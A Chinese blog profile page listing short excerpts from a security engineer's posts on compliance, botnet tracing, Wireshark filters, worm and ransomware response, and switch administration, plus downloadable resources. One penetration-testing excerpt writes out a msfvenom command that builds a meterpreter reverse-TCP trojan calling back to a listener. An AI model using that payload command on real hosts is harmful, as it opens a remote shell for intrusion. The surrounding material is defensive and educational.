自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 资源 (12)
  • 收藏
  • 关注

原创 企业网络安全资质一览表

针对有安全服务业务的公司,在招投标中经常会遇到企业安全资质相关门槛,以下为常见的有以下四个机构颁发的21个网络安全相关的资质,仅供参考。

2022-06-28 23:19:07 667

原创 等级保护三级测评要求表

信息安全技术-网络安全等级保护三级测评要求梳理针对等保三级测评要求进行梳理,形成控制域、控制点、测评要求、测评对象、测评实施表格,帮助测评人员、企业安全人员对照梳理偏离表:表格下载地址等保1-4级测评要求请关注后续。...

2021-12-24 10:03:56 4409 2

原创 linux抓取僵尸网络进程脚本

linux抓取僵尸网络进程脚本安全运维过程中经常会发现安全设备防火墙或IPS有僵尸网络攻击告警,直接阻断很可能影响业务,很多时候需要到源ip主机上溯源。以下编写shell脚本,记录访问目的ip的进程,根据进程由业务人员查看是否为正常业务,进一步做研判。#!/bin/bashread -t 30 -p "请输入僵尸网络IP:" IP_botnetcmd_results=`netstat -anp | grep "$IP_botnet"`while [ -z "$cmd_results" ] do

2021-11-24 18:00:22 2984

原创 华为交换机抓包上传至PC分析

华为交换机抓包上传至PC1 登录交换机配置ftp[HW_7703_A]ftp server enable[HW_7703_A]aaa[HW_7703_A-aaa]local-user ftpuser password cipher ftpuserinfo: A new user added[HW_7703_A-aaa]local-user ftpuser privilege level 15 ftp-directory cfcard:[HW_7703_A-aaa]local-user ftpu

2021-09-08 10:11:41 798

原创 ARP Miss攻击处置

1 ARP介绍2 ARP MISS攻击发现查看ARP Miss数量系统视图查看攻击源:displayarp anti-attack arpmiss-record-info3 ARP MISS攻击处置a 调整arp-miss的cpcar值来缓解CPU过高问题b 提高arp表老化时间(默认时间:5s)接口视图:arp-fake expire-time 30c 降低基于源ip限制arp包发送速率arp-miss speed-limit sourc

2021-08-11 17:58:59 2456

原创 渗透测试/应急演练过程中metasploit制作木马连接失败问题排查

声明:本文仅供学习交流,恶意人员请绕路,msf木马制作网上有很多教程,比较简单,大致说下步骤:1 生成木马在kali控制台输入: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f exe >/home/kali/111.exe-p 参数后跟上payload(载体),攻击成功之后,要做什么事情LHOST 后跟监听的IP,kali的ipLPORT 后跟监听

2021-07-07 19:26:55 1812

原创 企业网络信息安全意识宣贯——屏保制作

企业网络信息安全意识宣贯——屏保制作屏保程序的设置对企业信息安全的工作来说非常重要,可以有效防止人为的非授权访问。屏保程序也可以作为信息安全意识宣贯的重要途径。下边介绍屏保程序制作过程。1、制作宣传PPT此步骤结合自己单位的需要,制作相关的PPT,可以加入信息安全常识、企业愿景、文化等元素等。2、将PPT另存为.webm文件3、将.webm文件转换为.wmv视频文件这里用到在线转换工具:在线转换工具4、制作屏保程序.scr4.1 下载安装Screensaver Factory 64.2

2021-06-11 18:30:29 588

原创 基于wireshark快速定位内网DHCP Server仿冒攻击

基于wireshark快速定位内网DHCP Server仿冒攻击:子公司网络负责人反馈本部员工DHCP分配到的ip为非法ip,请求定位DHCP server攻击原理:由于DHCP发现报文(DHCP DISCOVER)以广播形式发送,所以DHCP Server仿冒者可以侦听到此报文。DHCP Server仿冒者回应给DHCP Client仿冒信息,如错误的ip地址快速定位:在获取到异常ip的主机上,开启wireshark抓包,基于DHCP报文交互特性,显示过滤输入条件:ip.addr == 25

2021-01-26 11:36:03 306

原创 wireshark过滤使用及常见网络攻击检测过滤

1、wireshark过滤方法:抓包过滤和显示过滤1、抓包过滤:设置抓包条件,只抓取符合条件的报文模块功能及使用介绍:1、选择抓包接口(选取网卡)2、抓包过滤条件:(须知:五元组(元素)确定一条流量)        5个元素:源目ip、源目port、协议。        3个逻辑符:与、或、非可填写:tcpudphost 192.

2020-12-30 16:50:57 949 2

原创 HCIE-Security心得

HCIE-Security心得致敬: 首先在此致敬所有问鼎专家级认证的战友们!奋斗的路上不孤独。其次声明本人不为任何机构所托,只是分享在自己通往CSO路程的一个历程记录与心得。考证背景本人是一名17级硕士毕业生,毕业后因为学校特殊性及专业名气,找工作还算顺利,进入了国企福利待遇都不错。然而官场氛围太严重,加上自己刚入社会傲气傲骨并存,年轻气盛导致各种不顺心。19年元旦过后果断裸辞,自掏腰包参加了网络信息安全行业敲门砖CISP培训,因为职业规划,选了CISP的CISO(管理方向)。空挡期实属难熬,

2020-12-29 18:09:00 1774 1

原创 飞客蠕虫病毒?分析、定位、处理

飞客蠕虫病毒?分析、定位、处理一、防火墙发现告警近期同一部门两个同事的电脑都有该告警。目的ip:104.18.120.91、104.18.119.91。虽然该部门不能上外网,出于严谨还是决定一探究竟。初步分析:百度查询该ip信息得知为美国ip,53端口为dns服务器所开放,主要用于域名解析。应该是某进程访问某一网址去该目的ip请求域名解析。微步在线先看下该ip情况:未发现目的有异常。...

2020-12-29 17:42:07 1022 1

原创 DVWA搭建中遇到的无法连接数据库问题及处理

@DVWA搭建中遇到的坑TOC#DVWA搭建中遇到的坑DVWA搭建教程网上有很多:如:DVWA的搭建1.下载phpStudyhttp://phpstudy.php.cn/phpStudy是集成了Apache和MySql的集成环境,下载好安装phpStudy,运行时若显示缺少VC运行库32位的VC9:http://www.microsoft.com/zh-CN/download/details.aspx?id=558264位的VC9:http://www.microsoft.com/zh-

2020-07-24 16:03:24 9595 3

原创 记一次勒索病毒攻击事件的处理过程

记一次勒索病毒攻击事件的处理过程记一次勒索病毒攻击事件的处理过程11时13分收到同事反馈,其电脑防病毒软件检测到勒索病毒或变种的攻击事件,攻击源:192.168.111.222告知被攻击用户动作紧急关闭445端口查找攻击源使用人根据IP-MAC记录表及上网行为管理AC上用户管理-IP-MAC绑定未查到攻击源ip。确定该用户为研发人员,禁止上网利用nmap查看攻击源信息发现主机名...

2019-08-02 17:38:53 2075

网络信息安全意识宣贯PPT

网络信息安全意识宣贯PPT,可设置作为终端屏幕保护程序等,用于提高员工安全意识

2022-07-28

网络安全漏洞分类分级指南

安全工作中经常遇见对漏洞的分类,通常见的有主机漏洞操作系统漏洞,中间件漏洞,数据库漏洞,web安全漏洞。然而这些只是约定成俗的分类,并非官方定义或推荐的。本指南针对这一问题介绍了漏洞的分类分级,为日常工作汇报提供官方依据。

2022-04-18

信息安全技术-网络安全等级保护三级测评要求.xlsx

针对等保三级测评要求进行梳理,形成控制域、控制点、测评要求、测评对象、测评实施表格,帮助测评人员、企业安全人员对照梳理偏离表

2021-12-02

linux抓取僵尸网络进程脚本

linux抓取僵尸网络进程脚本

2021-11-24

网络信息安全意识宣贯屏保CSDN.scr

企业网络信息安全意识宣贯屏保程序,原创作品,感谢支持。私信接受定制!

2021-06-11

windows server进程内存占用及CPU使用率自动监控并记录脚本

当遇到应用偶发性出问题时,需要分析是否因为该应用的进程内存使用率瞬时值过高或服务器CPU过高导致的,每隔5秒记录一次,自动监控并记录便于分析问题。

2021-05-21

网络信息安全应急演练方案 .docx

网络信息安全应急演练方案

2021-01-26

网络信息安全应急演练报告 .docx

网络信息安全应急演练报告

2021-01-26

windows一键关闭高危端口

windows一键关闭高危端口

2021-01-26

incaseformat病毒的预防及应急处置

incaseformat病毒的预防及应急处置

2021-01-14

windows开启RDP服务批处理脚本

因工作需要,有时普通员工电脑需要被远程,员工技术水平参差不齐,故编写一键开启RDP服务.bat脚本

2021-01-13

僵尸网络终端进程捕获python脚本(python版本3.7.3)

下一代防火墙NGAF发现终端有访问僵尸网路的告警,该告警不定时出现,特编写脚本在终端运行,捕获哪个进程访问僵尸网络目的ip。适合读者:网络信息安全运营工程师,网络信息安全事件溯源等

2020-12-31

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除